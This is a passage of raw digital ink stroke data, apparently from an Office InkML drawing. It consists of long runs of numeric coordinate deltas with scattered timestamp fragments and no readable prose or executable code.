0,-2 0 0,3 0 0,-1 0 0,-9 0 0,8 0 0,3 0 0,7 0 0,11 0 0,-10 0 0,16-5 0,-17 0 0,19-1 0,-12-2 0,11 7 0,-6-8 0,2 8 0,-4-8 0,9 8 0,-17-7 0,36 7 0,-39-3 0,48-1 0,-48 4 0,34-5 0,-2 1 0,-18-1 0,27 0 0,-32-3 0,5 8 0,6-8 0,-13 4 0,20-6 0,-28 6 0,18 0 0,-8 0 0,-10 0 0,18-1 0,-21 3 0,4-1 0,11 3 0,-20-6 0,33 6 0,-36-2 0,29-1 0,-15 2 0,-5-2 0,27-1 0,-36 4 0,29-8 0,-8 8 0,-10-7 0,40 8 0,-44-4 0,46-1 0,-23 4 0,-5-4 0,26 5 0,-48 0 0,34-4 0,-23 3 0,-5-3 0,7 4 0,-15-4 0,4 3 0,-5-3 0,4 4 0,-9 0 0,14 0 0,-12 0 0,13 0 0,2-5 0,-4 4 0,30-3 0,-23 4 0,17 0 0,8 0 0,-22 0 0,21 0 0,-26 0 0,5 0 0,6 0 0,-15 0 0,6 0 0,-3 0 0,-8 0 0,12 0 0,4 0 0,-15 0 0,46 5 0,-44 0 0,26 2 0,0 2 0,-21-4 0,27 5 0,-20 0 0,1-5 0,11 4 0,-17-8 0,4 8 0,-1-8 0,-13 6 0,12-6 0,-4 2 0,-4 1 0,5-3 0,3 3 0,-13 0 0,15-3 0,-7 2 0,1-3 0,6 5 0,14-4 0,-21 6 0,13-6 0,-19 2 0,14 2 0,-10-4 0,3 4 0,-1-1 0,-17-3 0,21 4 0,-6-5 0,-6 0 0,13 0 0,3 0 0,-14 0 0,19 0 0,-25 0 0,26 0 0,-20 0 0,19 0 0,-12 0 0,-9 0 0,14 0 0,-5 0 0,-9 0 0,13 0 0,-3 0 0,0 0 0,1 0 0,2 0 0,5 0 0,-10 0 0,32 0 0,-38 0 0,25 0 0,-4 0 0,-15 0 0,19 0 0,-9 0 0,-10 0 0,18 0 0,-9 0 0,-10 0 0,12 0 0,-9 0 0,-10 0 0,13 0 0,-3 0 0,-10 0 0,13 0 0,-21 0 0,22 0 0,-19 0 0,13 0 0,-17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9:43:57.07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3118 23 16383,'-79'0'0,"0"0"0,-24 0 0,6 0 0,46 0 0,1 0 0,-38 0 0,-1 0 0,31 0 0,1 0 0,-17 0 0,-1 0 0,14 0 0,2 0 0,0 0 0,2 0 0,-39 0 0,27 0 0,-12 0 0,29 0 0,-10 0 0,1 0 0,13 0 0,0 0 0,8 0 0,15 0 0,-2 0 0,12 0 0,1 0 0,-3 0 0,-4 0 0,-3 0 0,-9 0 0,9 0 0,-15 0 0,9 0 0,-10 0 0,6 0 0,4 0 0,2 0 0,-5 0 0,11 0 0,-15 0 0,21 0 0,-20 0 0,10 0 0,-6 0 0,4 0 0,5 0 0,-11 0 0,8 0 0,-12 0 0,8 0 0,-10 0 0,5 0 0,-5 0 0,15 0 0,-2 0 0,12 0 0,1 0 0,-3 0 0,1 0 0,-3 0 0,-4-4 0,4 3 0,-14-2 0,2 3 0,-9 0 0,0 0 0,4 0 0,-3 0 0,9-3 0,7 2 0,5-6 0,8 7 0,-7-3 0,3 3 0,-8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2:15.547"/>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1 16383,'69'0'0,"0"0"0,21 0 0,2 0 0,-17 0 0,0 0 0,-5 0 0,4 0 0,-5 0 0,4 0 0,4 0 0,4 0 0,13 0 0,1 0 0,-9 0 0,-17 0 0,-6 0 0,6 0 0,11 0 0,7 0 0,1 0 0,-8 0 0,-8 0 0,-5 0 0,-2 0 0,25 0 0,1 0 0,-25 0 0,1 0 0,0 0 0,4 0 0,-1 0 0,-1 0 0,21 0 0,-1 0 0,9 0 0,-2 0 0,-13 0 0,0 0 0,10 0 0,0 0 0,-10 0 0,0 0 0,-2 0 0,1 0 0,3 0 0,0 0 0,-3 0 0,2 0 0,7 3 0,2 1 0,0 0 0,1 1 0,0 2 0,-1 1 0,-3 0 0,-3-1 0,-21 0 0,-3 0 0,0-1 0,-4 1 0,22 4 0,1 0 0,-17-4 0,-19-3 0,-21-4 0,-2 0 0,-9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2:14.141"/>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0 204 16383,'83'3'0,"-7"2"0,-52-1 0,4 0 0,0-1 0,1 2 0,0 0 0,4-1 0,-4-4 0,5 4 0,1-3 0,-6 2 0,4 1 0,-4-3 0,0 3 0,4 0 0,-4-3 0,5 2 0,-5-3 0,4 0 0,2 5 0,1-4 0,9 3 0,-9-4 0,10 0 0,-5 0 0,0 0 0,-1 0 0,-5 0 0,-6 0 0,4 0 0,-9 0 0,4 0 0,5 0 0,-8 0 0,9 0 0,-1 0 0,-7 0 0,13 0 0,-10 0 0,5 0 0,13 0 0,2 0 0,13 0 0,0 0 0,7 0 0,-17 0 0,14 0 0,-17 0 0,13 0 0,0 0 0,0 0 0,-7 0 0,6 0 0,10 0 0,-5 0 0,-1 0 0,-7 0 0,-15-4 0,17 3 0,-11-8 0,5 8 0,-13-7 0,-1 7 0,-11-3 0,4 4 0,-9 0 0,4 0 0,0 0 0,-4 0 0,9 0 0,-4 0 0,5 0 0,0 0 0,6 0 0,-5 0 0,11 0 0,9 0 0,-11 0 0,16 0 0,-12 0 0,0 5 0,6-4 0,0 7 0,-5-6 0,3 2 0,-5 0 0,0-3 0,22 9 0,-16-9 0,22 9 0,-12-9 0,8 9 0,7-9 0,1 4 0,-1-5 0,8 0 0,-5 0 0,12 5 0,-4-3 0,7 3 0,0-5 0,-44 0 0,1 0 0,1 3 0,0 0 0,4-3 0,1 1 0,-1 2 0,1 0 0,-1-3 0,1 0 0,-1 0 0,1 0 0,3 0 0,0 0 0,-3 0 0,1 0 0,1 0 0,2 0 0,0 0 0,0 0 0,-3 0 0,0 0 0,5 0 0,-3 0 0,24 0 0,-37-1 0,2 2 0,42 5 0,-43-5 0,0 0 0,4 2 0,-1 0 0,41-3 0,-5 0 0,8 0 0,-44 3 0,0 0 0,24-2 0,-17 2 0,-1 0 0,-2-3 0,-8-1 0,3 2 0,39 5 0,-5-4 0,-34 1 0,1 0 0,34-3 0,1 0 0,9 0 0,0 0 0,-22 0 0,-20 0 0,-2 0 0,3 0 0,44 0 0,-43 0 0,37 0 0,-38-4 0,-2 1 0,-1-1 0,-10-5 0,10 0 0,1 0 0,2-2 0,38-7 0,-37 8 0,11-5 0,-13 4 0,1-4 0,-3 5 0,-6 1 0,1-1 0,-7 1 0,-1 4 0,-6-2 0,-5 2 0,4-3 0,2-1 0,0 5 0,5-4 0,-5 3 0,-1-4 0,0 1 0,0-1 0,6 0 0,-5 1 0,5-1 0,-6 0 0,1 1 0,-1-1 0,-5 1 0,4 3 0,-9-1 0,0 2 0,4-3 0,-5 3 0,24 1 0,9 3 0,23 0 0,-6 0 0,12 0 0,3 0 0,12 0 0,-14 0 0,-35 0 0,-2 0 0,26 0 0,14 0 0,-31 0 0,-3 0 0,11 0 0,-15 0 0,-2 0 0,2 0 0,19 0 0,-8 0 0,-7 0 0,-1 0 0,-7 0 0,0 0 0,0 0 0,-5 0 0,3 0 0,-3 0 0,5 0 0,14 0 0,-16 0 0,14 0 0,-11 0 0,1 0 0,4 0 0,-6 0 0,-5 0 0,-2 0 0,-6 0 0,0 0 0,-5-3 0,-1 2 0,0-3 0,-4 4 0,3 0 0,7-3 0,-9 2 0,8-2 0,-5 3 0,1 0 0,5 0 0,0 0 0,6 0 0,2 0 0,5 0 0,0 0 0,7 0 0,-6 0 0,13 0 0,-13 0 0,6 0 0,-7 0 0,14 0 0,-16 0 0,14 0 0,5 0 0,-5 0 0,18 0 0,-27 0 0,33 0 0,-39 0 0,39 0 0,-34 0 0,12 0 0,0 0 0,1 0 0,-1 0 0,-5 0 0,-2 0 0,-7 0 0,6 0 0,-10 0 0,10-5 0,-12 4 0,0-3 0,5 0 0,-10 3 0,4-3 0,-6 4 0,-5 0 0,4-4 0,-9 3 0,4-3 0,5 4 0,-2 0 0,3 0 0,-6 0 0,-5 0 0,10-3 0,-12 2 0,10-2 0,-8 3 0,3 0 0,3 0 0,-2 0 0,0 0 0,-2 0 0,7 0 0,-3 0 0,0 0 0,1 0 0,-8 0 0,1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2:09.101"/>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1 192 16383,'84'-8'0,"-1"6"0,-21-7 0,-10 9 0,21 0 0,-21-4 0,17 3 0,-8-8 0,1 7 0,-6-2 0,-2 0 0,-7 3 0,-6-4 0,-1 5 0,0 0 0,-5 0 0,11 0 0,-11 0 0,5 0 0,-6 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,-5 0 0,4 0 0,-4 0 0,5 0 0,0 0 0,6 0 0,15 0 0,2 0 0,13 0 0,-9 0 0,-5 0 0,4 0 0,-4 0 0,6 0 0,-1 0 0,1 0 0,7 0 0,-18 0 0,31-5 0,-29-1 0,31-5 0,-13 0 0,-12 5 0,32-11 0,-42 14 0,35-13 0,-29 15 0,7-8 0,0 8 0,0-9 0,0 9 0,16-3 0,-13 4 0,20 0 0,-21 0 0,-1 0 0,-3 0 0,-5 0 0,7 0 0,0 0 0,-7 0 0,5 0 0,-11 0 0,-1 0 0,-2 0 0,-5 0 0,6 0 0,0 0 0,7 0 0,9 0 0,0 0 0,0 0 0,-4 0 0,-3 0 0,5-5 0,-6 4 0,5-3 0,-5-1 0,7 4 0,-7-8 0,30 8 0,-24-3 0,33-1 0,-23 4 0,15-4 0,-19 5 0,15 0 0,-17 0 0,6 0 0,-2 0 0,0 0 0,-5 0 0,5 0 0,8 0 0,-11 4 0,18 2 0,-32 0 0,22-1 0,-23 0 0,18 1 0,-7 4 0,-1-4 0,-6 2 0,4-7 0,-10 8 0,5-8 0,7 8 0,-16-8 0,37 10 0,-41-10 0,48 10 0,-48-10 0,40 9 0,-30-9 0,43 10 0,-38-6 0,27 7 0,-34-3 0,38 3 0,-20-6 0,27 0 0,-42-3 0,38-2 0,-47 3 0,11-1 0,0 0 0,-11-2 0,40 5 0,-33-6 0,12 0 0,0 5 0,0-4 0,24 3 0,-30-4 0,-3 0 0,1 0 0,9 0 0,-12 0 0,1 0 0,37 0 0,8 0 0,0 0 0,0 0 0,-23 0 0,-19 3 0,0 1 0,24 2 0,-26-2 0,1 0 0,41 7 0,-14-5 0,6 1 0,-1 3 0,-25-9 0,19 5 0,-29-6 0,16 0 0,-11 0 0,-8 0 0,-13 0 0,-12-3 0,-1-14 0,11 10 0,-1-9 0,17 11 0,-7 4 0,5-7 0,7 2 0,-5-3 0,11-1 0,-12 0 0,12 0 0,-4 0 0,21-1 0,-11 5 0,-1 1 0,-6 0 0,-9 4 0,12-4 0,0 5 0,-7 0 0,5 0 0,-11 0 0,5-4 0,-13 3 0,-1-3 0,-6 4 0,0 0 0,-5-3 0,4 2 0,-4-3 0,0 4 0,4 0 0,-9-3 0,9 2 0,-4-2 0,5 3 0,6 0 0,-4 0 0,9 0 0,-9 0 0,9 0 0,-3 0 0,5 0 0,14 0 0,-16 0 0,36 0 0,-40 0 0,33 0 0,-25 0 0,7 0 0,4 0 0,-11 0 0,4 0 0,-5 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-6 0 0,4 0 0,-9 0 0,4 0 0,-6 0 0,0 0 0,0 0 0,0 0 0,-5 0 0,4 0 0,-9 0 0,9 0 0,-4 0 0,5 0 0,-5 0 0,3 0 0,-3 0 0,11 0 0,-5 0 0,11 0 0,-4 0 0,19 0 0,-17 0 0,38 0 0,-41 0 0,41 0 0,-15 0 0,-1 0 0,-15 0 0,-1 0 0,5 0 0,28 0 0,-3 0 0,-25 0 0,28 0 0,-26 0 0,7 0 0,5 0 0,-14 0 0,5 0 0,-11 0 0,-2 0 0,-1 0 0,-10 0 0,4 0 0,-11 0 0,-1-4 0,-5 3 0,1-5 0,3 3 0,2-1 0,3 1 0,-4 3 0,6 0 0,-5 0 0,5 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,-5 0 0,-6 0 0,4 0 0,-3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00:55.524"/>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0 16383,'61'0'0,"0"0"0,0 0 0,-5 0 0,8 0 0,21 0 0,-36 0 0,23 0 0,-3 0 0,-18 0 0,31 0 0,-22 0 0,12 0 0,8 0 0,3 0 0,7 0 0,-38 2 0,2 2 0,0-1 0,0 1 0,3 2 0,0 0 0,42 7 0,-45-7 0,-2 0 0,23 5 0,7 0 0,-1 0 0,1-4 0,14 3 0,-10-8 0,3 8 0,8-9 0,0 10 0,0-9 0,-23 7 0,10-8 0,-27 8 0,12-8 0,-14 4 0,6-1 0,-12-3 0,18 4 0,-10-5 0,13 0 0,-8 0 0,-7 0 0,5 0 0,-5 0 0,7 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-7 0 0,6 0 0,9 0 0,-4 0 0,0 0 0,0 0 0,-15 0 0,34 0 0,-31 0 0,44 0 0,-48 0 0,3 0 0,3 0 0,11 0 0,29 0 0,-39 0 0,16 0 0,-14 0 0,12 0 0,-2 0 0,-7 0 0,-7 0 0,5 0 0,11 0 0,-6 0 0,19 0 0,-20 0 0,-1 0 0,13 0 0,-24 0 0,-2 0 0,0 0 0,-1 0 0,34 0 0,-26 0 0,7 0 0,-5 0 0,3 0 0,20 0 0,-21 0 0,0 0 0,18 0 0,0 0 0,-1 0 0,9 0 0,-27 0 0,21 0 0,-22 0 0,11 0 0,0 0 0,-1 0 0,-18 0 0,31 0 0,-35 0 0,29 0 0,-14 0 0,1 0 0,14 0 0,-6 0 0,7 0 0,-13 0 0,2 0 0,-12 0 0,7 0 0,0 0 0,-7 0 0,5 0 0,-11 0 0,25 0 0,-21 0 0,9 0 0,-16 0 0,-11 0 0,0 0 0,-7 0 0,-5 0 0,6 0 0,-4 0 0,4 0 0,4 0 0,-3 0 0,0 0 0,-3 0 0,-7 0 0,6 0 0,3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2:04.377"/>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1 251 16383,'95'0'0,"1"0"0,-25 0 0,15-11 0,-5 9 0,-14-9 0,6 11 0,-14-5 0,2 2 0,1-1 0,8-2 0,-1 2 0,-2 2 0,-12 2 0,39-5 0,-43 4 0,16-4 0,-11 0 0,8 3 0,5-3 0,-14 5 0,-2 0 0,-6 0 0,0-4 0,0 3 0,0-3 0,1 4 0,-2 0 0,-4 0 0,3 0 0,-9 0 0,4 0 0,-6 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,6 0 0,-4 0 0,9 0 0,-9 0 0,10 0 0,-5 0 0,6 0 0,0 0 0,0 0 0,0 0 0,-6 0 0,-1 0 0,-6 0 0,0 0 0,0 0 0,0 0 0,-5 0 0,4 0 0,-4 0 0,5 0 0,1 0 0,5 0 0,-5 0 0,5 0 0,0 0 0,-5 0 0,5 0 0,0 0 0,1 0 0,0 0 0,5 0 0,-5 0 0,13 0 0,-5 0 0,4 0 0,1 0 0,-5 0 0,4 0 0,1 0 0,1 0 0,0 0 0,21 0 0,-17 0 0,6 0 0,-6 0 0,6 0 0,8 0 0,7 0 0,-18 0 0,-1 0 0,-7 0 0,24 0 0,-6 0 0,-5 0 0,-1 0 0,-16 0 0,12 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-7 0 0,6 0 0,9 0 0,-16 0 0,35 0 0,-48 0 0,32 4 0,-7-2 0,-13 2 0,37-4 0,-43 0 0,28 5 0,-20-4 0,31 4 0,-30-5 0,-2 0 0,-1 0 0,-9 0 0,39 0 0,-40 0 0,17 0 0,-5 0 0,7 0 0,-1 0 0,-5 0 0,4 0 0,-12 0 0,5 0 0,-7 0 0,2 0 0,5 0 0,-4 0 0,5 0 0,-13 0 0,5 0 0,-5 0 0,6 0 0,-6 0 0,-2 0 0,-10 0 0,-1 0 0,-5 0 0,8 0 0,-1 0 0,12 0 0,-6 0 0,16 0 0,-15 0 0,22-5 0,15 4 0,-18-4 0,27 5 0,-33 0 0,27 0 0,-23 0 0,13 0 0,-19 0 0,1 0 0,11 0 0,-11 0 0,11 0 0,11 0 0,-17 0 0,44 0 0,-42 0 0,18 0 0,-7 0 0,-16 0 0,18 0 0,-7 0 0,-7 0 0,6 0 0,-6 0 0,0 0 0,6 0 0,-6 0 0,7 0 0,-7 0 0,5 0 0,10 0 0,-16 0 0,20 0 0,-24 0 0,12 0 0,-7 0 0,-1 0 0,-1 0 0,-4 0 0,5 0 0,-7-4 0,0 3 0,14-8 0,-16 8 0,14-9 0,-11 9 0,1-7 0,4 7 0,-5-3 0,-1-1 0,0 4 0,0-3 0,0 0 0,0 3 0,0-3 0,7-1 0,-5 4 0,5-3 0,-1 4 0,-4 0 0,5-5 0,-1 4 0,-4-3 0,11 4 0,-11 0 0,5 0 0,-7 0 0,-6 0 0,-1 0 0,-6-4 0,0 4 0,-5-4 0,4 4 0,-9 0 0,4 0 0,10 0 0,-12 0 0,17 0 0,-8 0 0,0 0 0,5 0 0,0 0 0,1 0 0,1 0 0,3 0 0,-9 0 0,9 0 0,-9 0 0,10-4 0,-5 2 0,6-2 0,7 0 0,-11 3 0,31-9 0,-27 8 0,22-3 0,-15 0 0,1 0 0,7-1 0,0-3 0,0 7 0,0-7 0,0 8 0,-7-3 0,-1-1 0,15 4 0,-27-3 0,47-1 0,-53 3 0,54-3 0,-49 5 0,33 0 0,-24 0 0,5 0 0,-1 0 0,-7 0 0,-1 0 0,-4 0 0,3 0 0,-9 0 0,-1 0 0,-2 0 0,-4 0 0,5 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 4 0,0-3 0,0 3 0,-5-1 0,4-2 0,-9 2 0,4-3 0,1 0 0,-5 0 0,11 0 0,-8 0 0,-2 0 0,4 0 0,-9 0 0,9 0 0,-2 3 0,-5-3 0,2 3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1:59.784"/>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1 126 16383,'80'0'0,"-14"0"0,-33 0 0,-9 0 0,4 0 0,-3 0 0,-1 0 0,6 0 0,-4 0 0,0 0 0,3 0 0,-3 0 0,1 0 0,5 0 0,-14 0 0,15 0 0,-4 0 0,1 0 0,-1 0 0,-6 0 0,10 0 0,-7 0 0,3 0 0,3 0 0,-15 0 0,15 0 0,-7 0 0,-5 0 0,18 0 0,-21 0 0,15 0 0,-7 0 0,-1 0 0,7 0 0,-8 0 0,8 0 0,-1 0 0,-3 0 0,0 0 0,-2-4 0,-1 4 0,11-4 0,-10 1 0,0 2 0,1-2 0,5-1 0,4 3 0,-1-2 0,-1-1 0,-4 3 0,6-3 0,4 4 0,-3-3 0,10 2 0,-11-7 0,11 7 0,-10-6 0,9 6 0,-9-3 0,4 4 0,-6-4 0,5 3 0,-3-3 0,-1 4 0,-2 0 0,-9-3 0,4 2 0,1-2 0,-5 3 0,5 0 0,5-4 0,-9 3 0,9-3 0,-6 4 0,-4 0 0,9 0 0,1 0 0,2 0 0,9 0 0,-3 0 0,5 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-6 0 0,5 0 0,-10 0 0,9 0 0,-9 0 0,3 0 0,-4 0 0,-6 0 0,9 0 0,-7 0 0,9 0 0,-1 0 0,3 0 0,5 0 0,0 0 0,0 0 0,0 0 0,-5 0 0,3 0 0,-4 0 0,6 0 0,0 0 0,7 0 0,-11 0 0,23 0 0,-14 0 0,10 0 0,-1 0 0,-6 0 0,7 0 0,0 0 0,0 0 0,-7 0 0,5 0 0,-5 0 0,23-5 0,-19 4 0,24-5 0,-26 6 0,28 0 0,-12-5 0,21 4 0,-14-4 0,-8 5 0,-15 1 0,-2-2 0,5-3 0,9 3 0,2 1 0,8-4 0,-22 3 0,1 2 0,39-1 0,-1 0 0,-7-5 0,6 4 0,-29-4 0,-10 4 0,-3 2 0,-1-1 0,48 0 0,-42 0 0,13 0 0,5 0 0,4 0 0,0 0 0,-13 0 0,24 0 0,-48 0 0,41 0 0,-28 0 0,8 0 0,-1 0 0,-3 0 0,-12 0 0,6 0 0,-7 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,6 0 0,-4 0 0,4 0 0,16 0 0,-22 0 0,26 0 0,-23 0 0,5 0 0,5 0 0,-5 0 0,23 0 0,-12 0 0,11 0 0,-15 0 0,7 0 0,2 0 0,8 0 0,0 0 0,-21 0 0,16 0 0,2 0 0,-13 0 0,-9 0 0,0 0 0,2 0 0,37 0 0,-29 0 0,13 0 0,-6 0 0,7 5 0,-13-4 0,27 4 0,-15-5 0,21 0 0,-25 0 0,-22 0 0,0 0 0,27 0 0,-21 0 0,2 0 0,37 0 0,1 0 0,0 0 0,-8 0 0,-17 4 0,11-3 0,-16 3 0,12-4 0,-9 5 0,-8-4 0,-7 4 0,-7-5 0,-2 0 0,-11 0 0,0 0 0,-2 0 0,-9 0 0,4 0 0,0 0 0,-4 0 0,4 0 0,1 0 0,-9 0 0,14 0 0,-13 0 0,6 0 0,3-3 0,-12 3 0,22-3 0,-14 3 0,13 0 0,1 0 0,-5 0 0,5 0 0,-5 0 0,4 0 0,-3 0 0,3 0 0,-5 0 0,0 0 0,0 0 0,-4 0 0,2 0 0,-7 0 0,3 0 0,5 0 0,-8 0 0,4 0 0,-1 0 0,-8 0 0,24 4 0,-12-3 0,18 3 0,-9-4 0,1 0 0,4 0 0,-11 0 0,5 0 0,-6 3 0,1-2 0,-1 3 0,-5-4 0,-1 0 0,0 4 0,-4-3 0,3 3 0,1-4 0,-4 0 0,4 3 0,5-2 0,-7 2 0,7-3 0,-9 3 0,0-2 0,16 2 0,-9-3 0,14 4 0,-11-3 0,6 3 0,1-4 0,6 0 0,0 0 0,0 0 0,0 4 0,0-3 0,7 3 0,-11-4 0,9 0 0,-10 0 0,5 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-8 0 0,6 0 0,-11 0 0,11 0 0,-11 0 0,5 0 0,0 0 0,-5 0 0,5 0 0,-6 0 0,1 0 0,-6 0 0,4 0 0,-4 0 0,5 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-4 0 0,2 0 0,-2 0 0,4 0 0,-5 0 0,4 0 0,-9 0 0,9 0 0,-9 0 0,4-3 0,-1 2 0,-3-3 0,4 4 0,1-3 0,-6 2 0,5-5 0,-5-2 0,6 3 0,-4-2 0,4 7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4:58.52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 16383,'48'0'0,"-5"0"0,-15 0 0,-8 0 0,12 0 0,-16 0 0,6 0 0,-8 0 0,-2 0 0,6 0 0,0 0 0,15 0 0,-2 0 0,14 0 0,11 0 0,1 0 0,6 0 0,31 0 0,-42 0 0,-2 3 0,1-1 0,0 0 0,18 3 0,-7-5 0,0 4 0,0-3 0,-6 4 0,-3-1 0,-6-3 0,0 3 0,-1-4 0,1 0 0,-5 4 0,3-3 0,-3 3 0,-1-4 0,4 4 0,-9-3 0,4 3 0,0-4 0,-5 0 0,5 0 0,0 0 0,1 0 0,6 0 0,14 0 0,-16 0 0,37 0 0,-21 0 0,25 0 0,-27 0 0,15 0 0,-23 0 0,18 0 0,-7 0 0,0 0 0,0 0 0,0 0 0,-7 0 0,5 0 0,-11 0 0,11 0 0,-5 0 0,0 0 0,6 0 0,-12 0 0,11 0 0,-12 0 0,6 0 0,-8 0 0,1 0 0,-6-3 0,5 2 0,-5-3 0,20-1 0,-16 4 0,15-4 0,-13 5 0,9-5 0,-1 4 0,-1-4 0,-7 5 0,-6-4 0,-6 4 0,-7-4 0,-9 4 0,-5 0 0,2 0 0,-3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4:55.42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 16383,'0'0'0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6:32.984"/>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0 308 16383,'81'0'0,"-7"0"0,-13 0 0,-4 0 0,20 0 0,-6 0 0,0 0 0,6 0 0,2 0 0,9 0 0,-35 0 0,0 0 0,47 0 0,-48 0 0,1 0 0,44 0 0,0 0 0,-1 0 0,-27 0 0,-15 0 0,0 0 0,20 0 0,-25 0 0,2 0 0,42 0 0,-27 0 0,27 0 0,-12 0 0,8 0 0,5 0 0,-13 0 0,-9 0 0,-21 0 0,0 0 0,20 0 0,-15 0 0,2 0 0,30 0 0,9 0 0,0 0 0,0 0 0,-22 0 0,-14 0 0,-1 0 0,14 0 0,-17 0 0,2 0 0,28 0 0,-7 0 0,-7 0 0,19 0 0,-37 0 0,37 0 0,-35 0 0,12 0 0,-7-5 0,-1 4 0,-6-3 0,5 4 0,-11 0 0,12-5 0,0 4 0,10-9 0,-2 9 0,7-9 0,-19 9 0,26-4 0,-36 1 0,35 3 0,-31-7 0,12 7 0,-10-8 0,-6 4 0,1-1 0,-1-2 0,0 3 0,14-6 0,-4 6 0,12-5 0,-20 9 0,35-9 0,-29 8 0,39-8 0,-43 8 0,23-8 0,-15 9 0,35-4 0,-11 5 0,12 0 0,-17 0 0,-13 0 0,-14-3 0,0 0 0,6 2 0,2-3 0,-1 1 0,-3 3 0,35 0 0,-33 0 0,12-4 0,-7 3 0,-7-4 0,6 5 0,-13-4 0,0 3 0,-2-3 0,-11 4 0,11 0 0,-10 0 0,16 0 0,-20 0 0,33 0 0,-36 0 0,36 0 0,-32 0 0,19 0 0,-11 0 0,13 0 0,-5 0 0,11 0 0,3 0 0,8 0 0,7 0 0,0 5 0,-7 0 0,-8 6 0,-3-1 0,-12-1 0,6 1 0,-13-5 0,-10 0 0,-8-5 0,20 0 0,8 0 0,37 0 0,1 0 0,7 0 0,-7-5 0,-28 4 0,2 0 0,-1-4 0,1-1 0,12 5 0,2 0 0,2-5 0,0-1 0,-7 6 0,-2 0 0,0-2 0,-1 0 0,-5 3 0,-2 0 0,-2-3 0,-2 0 0,-4 3 0,-1-1 0,31-5 0,-24 5 0,-3 2 0,-3-1 0,13 0 0,1 0 0,-2 0 0,-14 0 0,1 0 0,26 0 0,-1 0 0,9 0 0,-6 0 0,14 0 0,-29 0 0,-16 0 0,0 0 0,27 0 0,21 0 0,-26 0 0,-21 0 0,0 0 0,21 0 0,-17 0 0,2 0 0,32 0 0,7 0 0,1-5 0,-8 3 0,-16-7 0,2 8 0,-11-9 0,14 4 0,-7 0 0,-1-4 0,-9 9 0,1-8 0,-6 8 0,4-8 0,-5 8 0,7-8 0,-7 3 0,5 1 0,-12-4 0,6 8 0,-7-3 0,0 0 0,-6 3 0,5-3 0,-5 4 0,12-5 0,-10 4 0,23-4 0,-14 5 0,4 0 0,27 0 0,-39 0 0,38 0 0,-32 0 0,12 0 0,-7 0 0,-1 0 0,-7 0 0,6 0 0,-4 0 0,5 0 0,7 0 0,-16 0 0,37 0 0,-46 0 0,37 5 0,-13-4 0,-12 4 0,19-1 0,-31-3 0,5 3 0,-1-4 0,-5 4 0,-6-3 0,-1 3 0,-6-4 0,7 0 0,-2 0 0,4 0 0,-5 0 0,0 0 0,3 0 0,-6 0 0,12 0 0,-15 0 0,16 0 0,-14 0 0,4 0 0,-7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6:29.146"/>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0 300 16383,'93'0'0,"5"0"0,0 0 0,-7 0 0,-35 0 0,0 0 0,43 0 0,-46 0 0,1 0 0,4 0 0,-1 0 0,34 0 0,-39 0 0,0 0 0,37 0 0,7 0 0,-41 0 0,0 0 0,36 0 0,8 0 0,-28 0 0,-1 0 0,-15 0 0,-1 0 0,0 0 0,-6 0 0,28 0 0,-17 0 0,26 0 0,-14 0 0,7 0 0,9 0 0,-20 0 0,-12 0 0,0 0 0,2 0 0,6 0 0,3 0 0,5 0 0,-19-4 0,1-2 0,34 4 0,1-8 0,-13 10 0,-20 0 0,-1 0 0,4 0 0,-8-2 0,2-1 0,12 2 0,15-4 0,-8 5 0,13-6 0,-18 5 0,19-4 0,-14 5 0,25-6 0,-5 4 0,-30-3 0,1-1 0,-6 2 0,-1 0 0,3-2 0,1-1 0,0 1 0,-3-1 0,21 1 0,-11-4 0,-3 1 0,-8 5 0,13-5 0,2-1 0,-5 4 0,-13 0 0,1-1 0,33-4 0,-5-1 0,6 6 0,-1 1 0,-5 0 0,14 3 0,-15-3 0,7 5 0,-10 0 0,-13 0 0,-14 0 0,0 0 0,21 0 0,-18 0 0,0 0 0,12 0 0,-14 0 0,-1 0 0,1 0 0,8 0 0,-2 0 0,-13 0 0,46 0 0,-39 0 0,34-5 0,-32 4 0,37-10 0,-29 10 0,6-5 0,-1 2 0,-16 2 0,19-2 0,-12 4 0,10-5 0,-11 4 0,6-3 0,-1 4 0,1 0 0,16-6 0,-5 5 0,13-4 0,-7 5 0,-1 0 0,8 0 0,-25 0 0,27 0 0,-35 0 0,31 0 0,-27 0 0,11 0 0,-20 0 0,0 0 0,-13 0 0,-2 0 0,-13 0 0,9 0 0,18 0 0,1 0 0,24 0 0,-10-5 0,0 4 0,-7-8 0,30 8 0,-8-9 0,-21 9 0,2 1 0,41-5 0,-42 4 0,0 2 0,42-1 0,-45 0 0,-2 0 0,23 0 0,16 0 0,-25 0 0,-15 0 0,2 0 0,28 0 0,15 0 0,-18 0 0,8 0 0,-5 0 0,6 0 0,0 0 0,-7 0 0,7 0 0,-23 0 0,4 0 0,12 0 0,-24 0 0,34 0 0,-38 0 0,42 6 0,-19-5 0,21 5 0,-18-6 0,-13 0 0,-14-1 0,-1 2 0,1 3 0,48-3 0,-23 2 0,7 2 0,13-3 0,-18 3 0,-19-5 0,-9 0 0,1 0 0,14 0 0,27 0 0,-18 0 0,8 0 0,-19 0 0,28 0 0,-40 0 0,18 0 0,8 5 0,-24-4 0,21 5 0,-24-2 0,36 3 0,-31-1 0,0 0 0,-2 0 0,-10-5 0,41 9 0,-35-8 0,13 7 0,-6-4 0,-3 1 0,1 3 0,-11-8 0,9 3 0,-11 0 0,1-3 0,17 9 0,-19-9 0,33 4 0,-34-1 0,21-3 0,-12 7 0,0-7 0,12 8 0,-11-8 0,-2 4 0,-1-1 0,-10-3 0,4 3 0,-11-4 0,-1 0 0,-5 0 0,6 0 0,-5 0 0,5 0 0,-4 3 0,-2-2 0,6 2 0,-5-3 0,2 0 0,1 0 0,-2 0 0,3 0 0,2 0 0,-9 0 0,9 0 0,-7 0 0,7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6:25.652"/>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1 268 16383,'86'0'0,"-3"0"0,-36 0 0,-9 0 0,14 0 0,-9 0 0,0 0 0,9 0 0,-11 0 0,6 0 0,0 0 0,-5 